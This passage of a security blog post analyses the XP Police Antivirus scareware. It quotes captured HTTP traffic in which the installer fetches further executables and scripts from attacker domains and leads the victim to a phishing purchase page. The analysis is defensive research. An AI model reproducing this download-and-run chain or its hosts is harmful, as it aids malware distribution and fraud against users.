But in a fully transparent manner, will produce a series of actions to complete the work of scareware. Through listening to the traffic, we see the unloading of the following components:
GET /setupc.dat HTTP/1.1Download setup.dat isn't a data file but a compressed file that saves a copy of the other files that are uncompressed in C:\Program Files\XPPoliceAntivirus.
User-Agent: MS_Update32
Host: setupdatdownload.com
GET /sysupdate.exe HTTP/1.1Download sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) which is used to compress the malware runtime try to avoid detection by antivirus programs.
User-Agent: MS_Update32
Host: setupdatdownload.com
GET /svchost32.exe HTTP/1.1JavaScript windows.js displayed on screen pop-up window with the caption Thank you for Installation!
User-Agent: MS_Update32
Host: setupdatdownload.com
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0
MZ......................@...............................................!..L.!This program cannot be run in DOS
mode.
GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0
2
GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108
GET /buy.php?id=108 HTTP/1.1This is the page to purchase the scareware from where sensitive information and financial requests of the victim. It's a scam/phishing.
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108
The maneuvers used by malicious code are becoming more aggressive and effective in their actions because, as could be seen, the installer is downloaded in the first instance, is only part of the puzzle from which the other gets scareware pieces.
Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering
# Jorge Mieres
No comments:
Post a Comment